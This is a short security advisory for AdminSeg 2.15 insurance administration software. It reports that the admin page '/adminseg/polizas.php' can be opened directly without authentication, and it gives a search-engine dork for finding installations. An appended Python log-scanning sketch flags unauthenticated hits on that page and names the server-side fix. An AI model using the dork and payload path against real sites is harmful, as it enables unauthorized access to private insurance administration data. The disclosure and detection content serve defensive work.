AdminSeg 2.15 Insecure Direct Object Reference

AdminSeg version 2.15 suffers from an insecure direct object reference that allows users to access the administrative interface.


SHA-256 | 2b5dd618f0754b260f9f8fb74ddf6f7aa6bde6279ed5f928ae9d8bfba55afc1a

====================================================================================================================================
| # Title : AdminSeg v2.15 Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(64-bit) |
| # Vendor : https://www.arwebs.net/producto/insurance-administration-software.html |
| # Dork : AdminSeg v2.15 |
====================================================================================================================================

poc :


[+] Dorking in Google or another search engine.

[+] Using this payload, you can access the admin panel directly.

[+] payload : /adminseg/polizas.php

[+] https://www.127.0.0.1/v2.15/adminseg/polizas.php

Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
|
=======================================================================================================================================
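Detection sketch for defenders, added here as an example and not part of the original advisory or the vendor's code: it scans web access logs for 200 responses to PHP scripts under /adminseg/ from clients with no earlier successful login. The login script name (a placeholder), the 302-on-successful-login behaviour, and the sample log lines are assumptions.

```python
import re

# Common/Combined Log Format prefix: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

ADMIN_DIR = "/adminseg/"                 # directory taken from the advisory's payload
LOGIN_SCRIPT = "LOGIN-PLACEHOLDER.php"   # assumption: replace with the real login script

def find_unauthenticated_admin_hits(lines, login_script=LOGIN_SCRIPT):
    """Return (client_ip, path) for admin scripts served with 200 to clients
    that have no prior successful login in the log (keyed by IP, so NAT and
    proxies can hide or blur clients; treat results as leads, not proof)."""
    logged_in = set()
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        # Match /adminseg/ anywhere so version prefixes like /v2.15/ are covered.
        _, sep, script = path.lower().rpartition(ADMIN_DIR)
        if not sep or not script.endswith(".php"):
            continue
        if script == login_script.lower():
            # Assumption: a successful login answers the POST with a 302.
            if m["method"] == "POST" and m["status"] == "302":
                logged_in.add(m["ip"])
            continue
        if m["status"] == "200" and m["ip"] not in logged_in:
            findings.append((m["ip"], path))
    return findings

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2023:09:00:01 +0000] "POST /v2.15/adminseg/LOGIN-PLACEHOLDER.php HTTP/1.1" 302 0',
    '192.0.2.10 - - [10/Jan/2023:09:00:02 +0000] "GET /v2.15/adminseg/polizas.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Jan/2023:09:05:00 +0000] "GET /v2.15/adminseg/polizas.php HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Jan/2023:09:05:30 +0000] "GET /v2.15/adminseg/LOGIN-PLACEHOLDER.php HTTP/1.1" 200 900',
    '203.0.113.5 - - [10/Jan/2023:09:06:00 +0000] "GET /v2.15/adminseg/polizas.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, path in find_unauthenticated_admin_hits(SAMPLE_LOG):
        print(f"admin page served without prior login: {ip} -> {path}")
```

A hit means the script returned content instead of redirecting to the login page; the server-side fix is an authorization check at the top of every script in the admin directory.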
